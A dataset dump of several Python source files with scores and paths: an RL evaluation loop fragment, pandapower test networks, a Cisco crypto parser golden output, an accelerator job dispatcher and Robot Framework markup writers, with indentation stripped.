multitask_obs = vec_env.reset() # (num_envs, 9, 84, 84)
offset = self.config.experiment.num_eval_episodes
while not np.all(done):
action = self.get_action_when_evaluating_vec_env_of_tasks(
multitask_obs=multitask_obs, modes=vec_env.mode
)
multitask_obs, reward, done, _ = vec_env.step(action)
mask = mask * (1 - done.astype(int))
episode_reward += reward * mask
start_index = 0
for mode in self.eval_modes_to_env_ids:
num_envs = len(self.eval_modes_to_env_ids[mode])
self.logger.log(
f"{mode}/episode_reward",
episode_reward[start_index : start_index + offset * num_envs].mean(),
step,
)
for _current_env_index, _current_env_id in enumerate(
self.eval_modes_to_env_ids[mode]
):
self.logger.log(
f"{mode}/episode_reward_env_index_{_current_env_index}",
episode_reward[
start_index
+ _current_env_index * offset : start_index
+ (_current_env_index + 1) * offset
].mean(),
step,
)
self.logger.log(
f"{mode}/env_index_{_current_env_index}", _current_env_id, step
)
start_index += offset * num_envs
self.logger.dump(step) | 0.926761 | 0.538862 |
# Copyright (c) 2016 by University of Kassel and Fraunhofer Institute for Wind Energy and Energy
# System Technology (IWES), Kassel. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pandapower as pp
def panda_four_load_branch():
"""
This function creates a simple six bus system with four radial low voltage nodes connected to \
a medium valtage slack bus. At every low voltage node the same load is connected.
RETURN:
**net** - Returns the required four load system
EXAMPLE:
import pandapower.networks as pn
net_four_load = pn.panda_four_load_branch()
"""
pd_net = pp.create_empty_network()
busnr1 = pp.create_bus(pd_net, name="bus1", vn_kv=10.)
busnr2 = pp.create_bus(pd_net, name="bus2", vn_kv=.4)
busnr3 = pp.create_bus(pd_net, name="bus3", vn_kv=.4)
busnr4 = pp.create_bus(pd_net, name="bus4", vn_kv=.4)
busnr5 = pp.create_bus(pd_net, name="bus5", vn_kv=.4)
busnr6 = pp.create_bus(pd_net, name="bus6", vn_kv=.4)
pp.create_ext_grid(pd_net, busnr1)
pp.create_transformer(pd_net, busnr1, busnr2, std_type="0.25 MVA 10/0.4 kV")
pp.create_line(pd_net, busnr2, busnr3, name="line1", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_line(pd_net, busnr3, busnr4, name="line2", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_line(pd_net, busnr4, busnr5, name="line3", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_line(pd_net, busnr5, busnr6, name="line4", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_load(pd_net, busnr3, 30, 10)
pp.create_load(pd_net, busnr4, 30, 10)
pp.create_load(pd_net, busnr5, 30, 10)
pp.create_load(pd_net, busnr6, 30, 10)
return pd_net
def four_loads_with_branches_out():
"""
This function creates a simple ten bus system with four radial low voltage nodes connected to \
a medium valtage slack bus. At every of the four radial low voltage nodes another low voltage \
node with a load is connected via cable.
RETURN:
**net** - Returns the required four load system with branches
EXAMPLE:
import pandapower.networks as pn
net_four_load_with_branches = pn.four_loads_with_branches_out()
"""
pd_net = pp.create_empty_network()
busnr1 = pp.create_bus(pd_net, name="bus1ref", vn_kv=10.)
pp.create_ext_grid(pd_net, busnr1)
busnr2 = pp.create_bus(pd_net, name="bus2", vn_kv=.4)
pp.create_transformer(pd_net, busnr1, busnr2, std_type="0.25 MVA 10/0.4 kV")
busnr3 = pp.create_bus(pd_net, name="bus3", vn_kv=.4)
pp.create_line(pd_net, busnr2, busnr3, name="line1", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr4 = pp.create_bus(pd_net, name="bus4", vn_kv=.4)
pp.create_line(pd_net, busnr3, busnr4, name="line2", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr5 = pp.create_bus(pd_net, name="bus5", vn_kv=.4)
pp.create_line(pd_net, busnr4, busnr5, name="line3", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr6 = pp.create_bus(pd_net, name="bus6", vn_kv=.4)
pp.create_line(pd_net, busnr5, busnr6, name="line4", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr7 = pp.create_bus(pd_net, name="bus7", vn_kv=.4)
pp.create_line(pd_net, busnr3, busnr7, name="line5", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr8 = pp.create_bus(pd_net, name="bus8", vn_kv=.4)
pp.create_line(pd_net, busnr4, busnr8, name="line6", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr9 = pp.create_bus(pd_net, name="bus9", vn_kv=.4)
pp.create_line(pd_net, busnr5, busnr9, name="line7", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr10 = pp.create_bus(pd_net, name="bus10", vn_kv=.4)
pp.create_line(pd_net, busnr6, busnr10, name="line8", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_load(pd_net, busnr7, p_kw=30, q_kvar=10)
pp.create_load(pd_net, busnr8, p_kw=30, q_kvar=10)
pp.create_load(pd_net, busnr9, p_kw=30, q_kvar=10)
pp.create_load(pd_net, busnr10, p_kw=30, q_kvar=10)
return pd_net
def simple_four_bus_system():
"""
This function creates a simple four bus system with two radial low voltage nodes connected to \
a medium valtage slack bus. At both low voltage nodes the a load and a static generator is \
connected.
RETURN:
**net** - Returns the required four bus system
EXAMPLE:
import pandapower.networks as pn
net_simple_four_bus = pn.simple_four_bus_system()
"""
net = pp.create_empty_network()
busnr1 = pp.create_bus(net, name="bus1ref", vn_kv=10)
pp.create_ext_grid(net, busnr1)
busnr2 = pp.create_bus(net, name="bus2", vn_kv=.4)
pp.create_transformer(net, busnr1, busnr2, name="transformer", std_type="0.25 MVA 10/0.4 kV")
busnr3 = pp.create_bus(net, name="bus3", vn_kv=.4)
pp.create_line(net, busnr2, busnr3, name="line1", length_km=0.50000, std_type="NAYY 4x50 SE")
busnr4 = pp.create_bus(net, name="bus4", vn_kv=.4)
pp.create_line(net, busnr3, busnr4, name="line2", length_km=0.50000, std_type="NAYY 4x50 SE")
pp.create_load(net, busnr3, 30, 10, name="load1")
pp.create_load(net, busnr4, 30, 10, name="load2")
pp.create_sgen(net, busnr3, p_kw=-20., q_kvar=-5., name="pv1", sn_kva=30)
pp.create_sgen(net, busnr4, p_kw=-15., q_kvar=-2., name="pv2", sn_kva=20)
return net
def simple_mv_open_ring_net():
"""
This function creates a simple medium voltage open ring network with loads at every medium \
voltage node.
As an example this function is used in the topology and diagnostic docu.
RETURN:
**net** - Returns the required simple medium voltage open ring network
EXAMPLE:
import pandapower.networks as pn
net_simple_open_ring = pn.simple_mv_open_ring_net()
"""
net = pp.create_empty_network()
pp.create_bus(net, name="110 kV bar", vn_kv=110, type='b')
pp.create_bus(net, name="20 kV bar", vn_kv=20, type='b')
pp.create_bus(net, name="bus 2", vn_kv=20, type='b')
pp.create_bus(net, name="bus 3", vn_kv=20, type='b')
pp.create_bus(net, name="bus 4", vn_kv=20, type='b')
pp.create_bus(net, name="bus 5", vn_kv=20, type='b')
pp.create_bus(net, name="bus 6", vn_kv=20, type='b')
pp.create_ext_grid(net, 0, vm_pu=1)
pp.create_line(net, name="line 0", from_bus=1, to_bus=2, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 1", from_bus=2, to_bus=3, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 2", from_bus=3, to_bus=4, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 3", from_bus=4, to_bus=5, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 4", from_bus=5, to_bus=6, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 5", from_bus=6, to_bus=1, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_transformer(net, hv_bus=0, lv_bus=1, std_type="25 MVA 110/20 kV")
pp.create_load(net, 2, p_kw=1000, q_kvar=200, name="load 0")
pp.create_load(net, 3, p_kw=1000, q_kvar=200, name="load 1")
pp.create_load(net, 4, p_kw=1000, q_kvar=200, name="load 2")
pp.create_load(net, 5, p_kw=1000, q_kvar=200, name="load 3")
pp.create_load(net, 6, p_kw=1000, q_kvar=200, name="load 4")
pp.create_switch(net, bus=1, element=0, et='l')
pp.create_switch(net, bus=2, element=0, et='l')
pp.create_switch(net, bus=2, element=1, et='l')
pp.create_switch(net, bus=3, element=1, et='l')
pp.create_switch(net, bus=3, element=2, et='l')
pp.create_switch(net, bus=4, element=2, et='l')
pp.create_switch(net, bus=4, element=3, et='l', closed=0)
pp.create_switch(net, bus=5, element=3, et='l')
pp.create_switch(net, bus=5, element=4, et='l')
pp.create_switch(net, bus=6, element=4, et='l')
pp.create_switch(net, bus=6, element=5, et='l')
pp.create_switch(net, bus=1, element=5, et='l')
return net | pandapower/networks/simple_pandapower_test_networks.py |
# Copyright (c) 2016 by University of Kassel and Fraunhofer Institute for Wind Energy and Energy
# System Technology (IWES), Kassel. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pandapower as pp
def panda_four_load_branch():
"""
This function creates a simple six bus system with four radial low voltage nodes connected to \
a medium valtage slack bus. At every low voltage node the same load is connected.
RETURN:
**net** - Returns the required four load system
EXAMPLE:
import pandapower.networks as pn
net_four_load = pn.panda_four_load_branch()
"""
pd_net = pp.create_empty_network()
busnr1 = pp.create_bus(pd_net, name="bus1", vn_kv=10.)
busnr2 = pp.create_bus(pd_net, name="bus2", vn_kv=.4)
busnr3 = pp.create_bus(pd_net, name="bus3", vn_kv=.4)
busnr4 = pp.create_bus(pd_net, name="bus4", vn_kv=.4)
busnr5 = pp.create_bus(pd_net, name="bus5", vn_kv=.4)
busnr6 = pp.create_bus(pd_net, name="bus6", vn_kv=.4)
pp.create_ext_grid(pd_net, busnr1)
pp.create_transformer(pd_net, busnr1, busnr2, std_type="0.25 MVA 10/0.4 kV")
pp.create_line(pd_net, busnr2, busnr3, name="line1", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_line(pd_net, busnr3, busnr4, name="line2", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_line(pd_net, busnr4, busnr5, name="line3", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_line(pd_net, busnr5, busnr6, name="line4", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_load(pd_net, busnr3, 30, 10)
pp.create_load(pd_net, busnr4, 30, 10)
pp.create_load(pd_net, busnr5, 30, 10)
pp.create_load(pd_net, busnr6, 30, 10)
return pd_net
def four_loads_with_branches_out():
"""
This function creates a simple ten bus system with four radial low voltage nodes connected to \
a medium valtage slack bus. At every of the four radial low voltage nodes another low voltage \
node with a load is connected via cable.
RETURN:
**net** - Returns the required four load system with branches
EXAMPLE:
import pandapower.networks as pn
net_four_load_with_branches = pn.four_loads_with_branches_out()
"""
pd_net = pp.create_empty_network()
busnr1 = pp.create_bus(pd_net, name="bus1ref", vn_kv=10.)
pp.create_ext_grid(pd_net, busnr1)
busnr2 = pp.create_bus(pd_net, name="bus2", vn_kv=.4)
pp.create_transformer(pd_net, busnr1, busnr2, std_type="0.25 MVA 10/0.4 kV")
busnr3 = pp.create_bus(pd_net, name="bus3", vn_kv=.4)
pp.create_line(pd_net, busnr2, busnr3, name="line1", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr4 = pp.create_bus(pd_net, name="bus4", vn_kv=.4)
pp.create_line(pd_net, busnr3, busnr4, name="line2", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr5 = pp.create_bus(pd_net, name="bus5", vn_kv=.4)
pp.create_line(pd_net, busnr4, busnr5, name="line3", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr6 = pp.create_bus(pd_net, name="bus6", vn_kv=.4)
pp.create_line(pd_net, busnr5, busnr6, name="line4", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr7 = pp.create_bus(pd_net, name="bus7", vn_kv=.4)
pp.create_line(pd_net, busnr3, busnr7, name="line5", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr8 = pp.create_bus(pd_net, name="bus8", vn_kv=.4)
pp.create_line(pd_net, busnr4, busnr8, name="line6", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr9 = pp.create_bus(pd_net, name="bus9", vn_kv=.4)
pp.create_line(pd_net, busnr5, busnr9, name="line7", length_km=0.05,
std_type="NAYY 4x120 SE")
busnr10 = pp.create_bus(pd_net, name="bus10", vn_kv=.4)
pp.create_line(pd_net, busnr6, busnr10, name="line8", length_km=0.05,
std_type="NAYY 4x120 SE")
pp.create_load(pd_net, busnr7, p_kw=30, q_kvar=10)
pp.create_load(pd_net, busnr8, p_kw=30, q_kvar=10)
pp.create_load(pd_net, busnr9, p_kw=30, q_kvar=10)
pp.create_load(pd_net, busnr10, p_kw=30, q_kvar=10)
return pd_net
def simple_four_bus_system():
"""
This function creates a simple four bus system with two radial low voltage nodes connected to \
a medium valtage slack bus. At both low voltage nodes the a load and a static generator is \
connected.
RETURN:
**net** - Returns the required four bus system
EXAMPLE:
import pandapower.networks as pn
net_simple_four_bus = pn.simple_four_bus_system()
"""
net = pp.create_empty_network()
busnr1 = pp.create_bus(net, name="bus1ref", vn_kv=10)
pp.create_ext_grid(net, busnr1)
busnr2 = pp.create_bus(net, name="bus2", vn_kv=.4)
pp.create_transformer(net, busnr1, busnr2, name="transformer", std_type="0.25 MVA 10/0.4 kV")
busnr3 = pp.create_bus(net, name="bus3", vn_kv=.4)
pp.create_line(net, busnr2, busnr3, name="line1", length_km=0.50000, std_type="NAYY 4x50 SE")
busnr4 = pp.create_bus(net, name="bus4", vn_kv=.4)
pp.create_line(net, busnr3, busnr4, name="line2", length_km=0.50000, std_type="NAYY 4x50 SE")
pp.create_load(net, busnr3, 30, 10, name="load1")
pp.create_load(net, busnr4, 30, 10, name="load2")
pp.create_sgen(net, busnr3, p_kw=-20., q_kvar=-5., name="pv1", sn_kva=30)
pp.create_sgen(net, busnr4, p_kw=-15., q_kvar=-2., name="pv2", sn_kva=20)
return net
def simple_mv_open_ring_net():
"""
This function creates a simple medium voltage open ring network with loads at every medium \
voltage node.
As an example this function is used in the topology and diagnostic docu.
RETURN:
**net** - Returns the required simple medium voltage open ring network
EXAMPLE:
import pandapower.networks as pn
net_simple_open_ring = pn.simple_mv_open_ring_net()
"""
net = pp.create_empty_network()
pp.create_bus(net, name="110 kV bar", vn_kv=110, type='b')
pp.create_bus(net, name="20 kV bar", vn_kv=20, type='b')
pp.create_bus(net, name="bus 2", vn_kv=20, type='b')
pp.create_bus(net, name="bus 3", vn_kv=20, type='b')
pp.create_bus(net, name="bus 4", vn_kv=20, type='b')
pp.create_bus(net, name="bus 5", vn_kv=20, type='b')
pp.create_bus(net, name="bus 6", vn_kv=20, type='b')
pp.create_ext_grid(net, 0, vm_pu=1)
pp.create_line(net, name="line 0", from_bus=1, to_bus=2, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 1", from_bus=2, to_bus=3, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 2", from_bus=3, to_bus=4, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 3", from_bus=4, to_bus=5, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 4", from_bus=5, to_bus=6, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_line(net, name="line 5", from_bus=6, to_bus=1, length_km=1,
std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
pp.create_transformer(net, hv_bus=0, lv_bus=1, std_type="25 MVA 110/20 kV")
pp.create_load(net, 2, p_kw=1000, q_kvar=200, name="load 0")
pp.create_load(net, 3, p_kw=1000, q_kvar=200, name="load 1")
pp.create_load(net, 4, p_kw=1000, q_kvar=200, name="load 2")
pp.create_load(net, 5, p_kw=1000, q_kvar=200, name="load 3")
pp.create_load(net, 6, p_kw=1000, q_kvar=200, name="load 4")
pp.create_switch(net, bus=1, element=0, et='l')
pp.create_switch(net, bus=2, element=0, et='l')
pp.create_switch(net, bus=2, element=1, et='l')
pp.create_switch(net, bus=3, element=1, et='l')
pp.create_switch(net, bus=3, element=2, et='l')
pp.create_switch(net, bus=4, element=2, et='l')
pp.create_switch(net, bus=4, element=3, et='l', closed=0)
pp.create_switch(net, bus=5, element=3, et='l')
pp.create_switch(net, bus=5, element=4, et='l')
pp.create_switch(net, bus=6, element=4, et='l')
pp.create_switch(net, bus=6, element=5, et='l')
pp.create_switch(net, bus=1, element=5, et='l')
return net | 0.847005 | 0.246737 |
expected_output={
'crypto_eng': {
'crypto_engine': 'Software Crypto Engine',
'crypto_engine_num': 1,
'dh_in_free': 41008,
'dh_in_freeing': 0,
'dh_in_use': 0
},
'crypto_engine': {
'IOSXE-ESP(14)': {
'capability': 'DES, 3DES, AES, GCM, GMAC, RSA, IPv6, GDOI, FAILCLOSE, ESN',
'dtlsv1': [],
'ipsec_session': {
'active': 6004,
'created': 414018,
'failed': 0,
'max': 40958
},
'max_ssl_connec': 10000,
'ssl_support': 'Yes',
'ssl_versions': 'TLSv1.0',
'sslv3': [],
'state': 'Active',
'tlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
]
},
'Software Crypto Engine': {
'capability': 'IPPCP, DES, 3DES, AES, SEAL, GCM, GMAC, RSA, P-256, P-384, P-521, IPv6, GDOI, FAILCLOSE, HA',
'dh': {
'active': 0,
'created': 320010,
'failed': 0,
'max': 41008
},
'dtlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
],
'ike_session': {
'active': 0,
'created': 319288,
'failed': 0,
'max': 41058
},
'ikev2_session': {
'active': 3002,
'created': 319288,
'failed': 0,
'max': 41058
},
'ipsec_session': {
'active': 0,
'created': 0,
'failed': 0,
'max': 1000
},
'max_ssl_connec': 1000,
'ssl_namespace': 1,
'ssl_support': 'Yes',
'sslv3': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
],
'state': 'Active',
'tlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
]
},
'act2': {
'capability': 'RSA',
'state': 'Active'
}
},
'crypto_engines_num': 3,
'dh_calculations': {
'p1': 722,
'ss': 319288
},
'dh_lifetime_seconds': 86400,
'hardware_encryption': 'ACTIVE',
'number_dh_pregenerated': 4
} | src/genie/libs/parser/iosxe/tests/ShowCryptoEliAll/cli/equal/golden_output_expected.py | expected_output={
'crypto_eng': {
'crypto_engine': 'Software Crypto Engine',
'crypto_engine_num': 1,
'dh_in_free': 41008,
'dh_in_freeing': 0,
'dh_in_use': 0
},
'crypto_engine': {
'IOSXE-ESP(14)': {
'capability': 'DES, 3DES, AES, GCM, GMAC, RSA, IPv6, GDOI, FAILCLOSE, ESN',
'dtlsv1': [],
'ipsec_session': {
'active': 6004,
'created': 414018,
'failed': 0,
'max': 40958
},
'max_ssl_connec': 10000,
'ssl_support': 'Yes',
'ssl_versions': 'TLSv1.0',
'sslv3': [],
'state': 'Active',
'tlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
]
},
'Software Crypto Engine': {
'capability': 'IPPCP, DES, 3DES, AES, SEAL, GCM, GMAC, RSA, P-256, P-384, P-521, IPv6, GDOI, FAILCLOSE, HA',
'dh': {
'active': 0,
'created': 320010,
'failed': 0,
'max': 41008
},
'dtlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
],
'ike_session': {
'active': 0,
'created': 319288,
'failed': 0,
'max': 41058
},
'ikev2_session': {
'active': 3002,
'created': 319288,
'failed': 0,
'max': 41058
},
'ipsec_session': {
'active': 0,
'created': 0,
'failed': 0,
'max': 1000
},
'max_ssl_connec': 1000,
'ssl_namespace': 1,
'ssl_support': 'Yes',
'sslv3': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
],
'state': 'Active',
'tlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
]
},
'act2': {
'capability': 'RSA',
'state': 'Active'
}
},
'crypto_engines_num': 3,
'dh_calculations': {
'p1': 722,
'ss': 319288
},
'dh_lifetime_seconds': 86400,
'hardware_encryption': 'ACTIVE',
'number_dh_pregenerated': 4
} | 0.498291 | 0.236593 |
from __future__ import print_function
from __future__ import division
import os
import time
from signal import SIGTERM, SIGKILL
from accelerator.compat import PY3
from accelerator.status import children, statmsg_endwait
from accelerator.build import JobError
valid_fds = []
def update_valid_fds():
# Collect all valid fds, so we can close them in job processes
global valid_fds
valid_fds = []
from fcntl import fcntl, F_GETFD
from resource import getrlimit, RLIMIT_NOFILE
for fd in range(3, getrlimit(RLIMIT_NOFILE)[0]):
try:
fcntl(fd, F_GETFD)
valid_fds.append(fd)
except Exception:
pass
def close_fds(keep):
for fd in valid_fds:
# Apparently sometimes one of them has gone away.
# That's a little worrying, so try to protect our stuff (and ignore errors).
try:
if fd not in keep:
os.close(fd)
except OSError:
pass
def run(cmd, close_in_child, keep_in_child, with_pgrp=True):
child = os.fork()
if child:
return child
if with_pgrp:
os.setpgrp() # this pgrp is killed if the job fails
for fd in close_in_child:
os.close(fd)
keep_in_child = set(keep_in_child)
keep_in_child.add(int(os.getenv('BD_STATUS_FD')))
keep_in_child.add(int(os.getenv('BD_TERM_FD')))
close_fds(keep_in_child)
# unreadable stdin - less risk of stuck jobs
devnull = os.open('/dev/null', os.O_RDONLY)
os.dup2(devnull, 0)
os.close(devnull)
if PY3:
keep_in_child.update([1, 2])
for fd in keep_in_child:
os.set_inheritable(fd, True)
os.execv(cmd[0], cmd)
os._exit()
def launch(workdir, setup, config, Methods, active_workdirs, slices, debug, daemon_url, subjob_cookie, parent_pid):
starttime = time.time()
jobid = setup.jobid
method = setup.method
if subjob_cookie:
print_prefix = ''
else:
print_prefix = ' '
print('%s| %s [%s] |' % (print_prefix, jobid, method,))
args = dict(
workdir=workdir,
slices=slices,
jobid=jobid,
result_directory=config.get('result_directory', ''),
common_directory=config.get('common_directory', ''),
input_directory=config.get('input_directory', ''),
workdirs=active_workdirs,
daemon_url=daemon_url,
subjob_cookie=subjob_cookie,
parent_pid=parent_pid,
)
from accelerator.runner import runners
runner = runners[Methods.db[method].version]
child, prof_r = runner.launch_start(args)
# There's a race where if we get interrupted right after fork this is not recorded
# (the launched job could continue running)
try:
children.add(child)
status, data = runner.launch_finish(child, prof_r, workdir, jobid, method)
if status:
os.killpg(child, SIGTERM) # give it a chance to exit gracefully
# The dying process won't have sent an end message, so it has
# the endwait time until we SIGKILL it.
print('%s| %s [%s] failed! (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
# There is a race where stuff on the status socket has not arrived when
# the sending process exits. This is basically benign, but let's give
# it a chance to arrive to cut down on confusing warnings.
statmsg_endwait(child, 0.1)
finally:
try:
os.killpg(child, SIGKILL) # this should normally be a no-op, but in case it left anything.
except Exception:
pass
try:
children.remove(child)
except Exception:
pass
try:
# won't block long (we just killed it, plus it had probably already exited)
runner.launch_waitpid(child)
except Exception:
pass
if status:
raise JobError(jobid, method, status)
print('%s| %s [%s] completed. (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
return data | accelerator/dispatch.py |
from __future__ import print_function
from __future__ import division
import os
import time
from signal import SIGTERM, SIGKILL
from accelerator.compat import PY3
from accelerator.status import children, statmsg_endwait
from accelerator.build import JobError
valid_fds = []
def update_valid_fds():
# Collect all valid fds, so we can close them in job processes
global valid_fds
valid_fds = []
from fcntl import fcntl, F_GETFD
from resource import getrlimit, RLIMIT_NOFILE
for fd in range(3, getrlimit(RLIMIT_NOFILE)[0]):
try:
fcntl(fd, F_GETFD)
valid_fds.append(fd)
except Exception:
pass
def close_fds(keep):
for fd in valid_fds:
# Apparently sometimes one of them has gone away.
# That's a little worrying, so try to protect our stuff (and ignore errors).
try:
if fd not in keep:
os.close(fd)
except OSError:
pass
def run(cmd, close_in_child, keep_in_child, with_pgrp=True):
child = os.fork()
if child:
return child
if with_pgrp:
os.setpgrp() # this pgrp is killed if the job fails
for fd in close_in_child:
os.close(fd)
keep_in_child = set(keep_in_child)
keep_in_child.add(int(os.getenv('BD_STATUS_FD')))
keep_in_child.add(int(os.getenv('BD_TERM_FD')))
close_fds(keep_in_child)
# unreadable stdin - less risk of stuck jobs
devnull = os.open('/dev/null', os.O_RDONLY)
os.dup2(devnull, 0)
os.close(devnull)
if PY3:
keep_in_child.update([1, 2])
for fd in keep_in_child:
os.set_inheritable(fd, True)
os.execv(cmd[0], cmd)
os._exit()
def launch(workdir, setup, config, Methods, active_workdirs, slices, debug, daemon_url, subjob_cookie, parent_pid):
starttime = time.time()
jobid = setup.jobid
method = setup.method
if subjob_cookie:
print_prefix = ''
else:
print_prefix = ' '
print('%s| %s [%s] |' % (print_prefix, jobid, method,))
args = dict(
workdir=workdir,
slices=slices,
jobid=jobid,
result_directory=config.get('result_directory', ''),
common_directory=config.get('common_directory', ''),
input_directory=config.get('input_directory', ''),
workdirs=active_workdirs,
daemon_url=daemon_url,
subjob_cookie=subjob_cookie,
parent_pid=parent_pid,
)
from accelerator.runner import runners
runner = runners[Methods.db[method].version]
child, prof_r = runner.launch_start(args)
# There's a race where if we get interrupted right after fork this is not recorded
# (the launched job could continue running)
try:
children.add(child)
status, data = runner.launch_finish(child, prof_r, workdir, jobid, method)
if status:
os.killpg(child, SIGTERM) # give it a chance to exit gracefully
# The dying process won't have sent an end message, so it has
# the endwait time until we SIGKILL it.
print('%s| %s [%s] failed! (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
# There is a race where stuff on the status socket has not arrived when
# the sending process exits. This is basically benign, but let's give
# it a chance to arrive to cut down on confusing warnings.
statmsg_endwait(child, 0.1)
finally:
try:
os.killpg(child, SIGKILL) # this should normally be a no-op, but in case it left anything.
except Exception:
pass
try:
children.remove(child)
except Exception:
pass
try:
# won't block long (we just killed it, plus it had probably already exited)
runner.launch_waitpid(child)
except Exception:
pass
if status:
raise JobError(jobid, method, status)
print('%s| %s [%s] completed. (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
return data | 0.290578 | 0.100084 |
from .markuputils import attribute_escape, html_escape, xml_escape
from .robottypes import is_string
from .robotio import file_writer
class _MarkupWriter(object):
def __init__(self, output, write_empty=True):
"""
:param output: Either an opened, file like object, or a path to the
desired output file. In the latter case, the file is created
and clients should use :py:meth:`close` method to close it.
:param write_empty: Whether to write empty elements and attributes.
"""
if is_string(output):
output = file_writer(output)
self.output = output
self._write_empty = write_empty
self._preamble()
def _preamble(self):
pass
def start(self, name, attrs=None, newline=True):
attrs = self._format_attrs(attrs)
self._start(name, attrs, newline)
def _start(self, name, attrs, newline):
self._write('<%s %s>' % (name, attrs) if attrs else '<%s>' % name,
newline)
def _format_attrs(self, attrs):
if not attrs:
return ''
attrs = [(k, attribute_escape(attrs[k] or ''))
for k in self._order_attrs(attrs)]
write_empty = self._write_empty
return ' '.join('%s="%s"' % a for a in attrs if write_empty or a[1])
def _order_attrs(self, attrs):
return attrs
def content(self, content=None, escape=True, newline=False):
if content:
self._write(self._escape(content) if escape else content, newline)
def _escape(self, content):
raise NotImplementedError
def end(self, name, newline=True):
self._write('</%s>' % name, newline)
def element(self, name, content=None, attrs=None, escape=True,
newline=True, replace_newlines=False):
attrs = self._format_attrs(attrs)
if self._write_empty or content or attrs:
self._start(name, attrs, newline=False)
self.content(content, escape, replace_newlines)
self.end(name, newline)
def close(self):
"""Closes the underlying output file."""
self.output.close()
def _write(self, text, newline=False):
self.output.write(text)
if newline:
self.output.write('\n')
class HtmlWriter(_MarkupWriter):
def _order_attrs(self, attrs):
return sorted(attrs) # eases testing
def _escape(self, content):
return html_escape(content)
class XmlWriter(_MarkupWriter):
def _preamble(self):
self._write('<?xml version="1.0" encoding="UTF-8"?>', newline=True)
def _escape(self, text):
return xml_escape(text)
class NullMarkupWriter(object):
"""Null implementation of _MarkupWriter interface."""
__init__ = start = content = element = end = close = lambda *args: None | new/Lib/robot/utils/markupwriters.py |
from .markuputils import attribute_escape, html_escape, xml_escape
from .robottypes import is_string
from .robotio import file_writer
class _MarkupWriter(object):
def __init__(self, output, write_empty=True):
"""
:param output: Either an opened, file like object, or a path to the
desired output file. In the latter case, the file is created
and clients should use :py:meth:`close` method to close it.
:param write_empty: Whether to write empty elements and attributes.
"""
if is_string(output):
output = file_writer(output)
self.output = output
self._write_empty = write_empty
self._preamble()
def _preamble(self):
pass
def start(self, name, attrs=None, newline=True):
attrs = self._format_attrs(attrs)
self._start(name, attrs, newline)
def _start(self, name, attrs, newline):
self._write('<%s %s>' % (name, attrs) if attrs else '<%s>' % name,
newline)
def _format_attrs(self, attrs):
if not attrs:
return ''
attrs = [(k, attribute_escape(attrs[k] or ''))
for k in self._order_attrs(attrs)]
write_empty = self._write_empty
return ' '.join('%s="%s"' % a for a in attrs if write_empty or a[1])
def _order_attrs(self, attrs):
return attrs
